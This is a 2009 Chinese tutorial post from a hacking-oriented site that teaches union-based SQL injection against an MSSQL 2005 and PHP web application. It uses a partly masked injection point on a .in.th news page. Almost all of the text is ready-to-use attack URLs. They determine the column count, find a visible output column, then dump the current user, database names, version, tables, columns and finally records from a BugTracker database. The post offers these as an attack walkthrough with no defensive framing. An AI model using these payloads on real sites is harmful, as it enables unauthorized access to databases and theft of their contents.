黑基网 首页 学院 电脑技术 查看内容

mssql 2005+php 注射语句

2009-4-23 11:03| 投稿: computer

摘要:   注射点:http://xxx.in.th/news_show.php?newsid=400   要用union查询的话,先确定有几个字段,使用order by 来完成,就是:   http:/...
  注射点:http://xxx.in.th/news_show.php?newsid=400   要用union查询的话,先确定有几个字段,使用order by 来完成,就是:   http://xxx.in.th/news_show.php?newsid=400 order by 7-- 回显正常   http://xxx.in.th/news_show.php?newsid=400 order by 8-- 回显失败   说明总共7个字段,然后用null填充   http://xxx.in.th/news_show.php?newsid=400 union all select null,null,null,null,null,null,null--显示正常   变换成不存在的id,前面加负号,或者加上and 1=2的条件,比如   http://xxx.in.th/news_show.php?newsid=99999 union all select null,null,null,null,null,null,null--   确定下哪个位置可以爆出结果,先从第一个null开始变换,直接替换成user,就是:   http://xxx.in.th/news_show.php?newsid=99999 union all select user,null,null,null,null,null,null--   看来运气比较好,当前用户名直接出现在某个可见的位置,要是没显示结果就继续变换位置   那就从这个位置开始暴出我们想要的结果   1.变换id获得库名   http://xxx.in.th/news_show.php?newsid=400 and 1=2 union all select name,null,null,null,null,null,null+from+master.dbo.sysdatabases+where+dbid=1--   2.获得当前库名   http://xxx.in.th/news_show.php?newsid=400 and 1=2 union all select db_name(),null,null,null,null,null,null--   3.获得当前版本   http://xxx.in.th/news_show.php?newsid=400 and 1=2 union all select @@version,null,null,null,null,null,null--   4.变换N获得指定库的表名   http://xxx.in.th/news_show.php?newsid=400 and 1=2 union all select name,null,null,null,null,null,null+from+BugTracker.dbo.sysobjects+where xtype=CHAR(85) and name not in (select top N name from BugTracker.dbo.sysobjects where xtype=CHAR(85))--   5.获得指定库所有列名   (1) 这里的M和获得库名时的N必须一致,不然无法得到正确的库名ID   http://xxx.in.th/news_show.php?newsid=400 and 1=2 union all select ID,null,null,null,null,null,null+from+BugTracker.dbo.sysobjects+where xtype=CHAR(85) and ID not in (select top M ID from BugTracker.dbo.sysobjects where xtype=CHAR(85))--   (2)最后的ID值即是(1)中回显的数值,通过变换N值获得所有列名   http://xxx.in.th/news_show.php?newsid=400 and 1=2 union all select NAME,null,null,null,null,null,null from BugTracker.dbo.syscolumns where ID=53575229 and name not in (select top N name from BugTracker.dbo.syscolumns where ID=53575229)--   6.根据前几步所得结果获得字段内容   http://xxx.in.th/news_show.php?newsid=400 and 1=2 union all select bug_id,null,null,null,null,null,null from BugTracker..mantis_bug_file_table--可自加条件进行查询
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部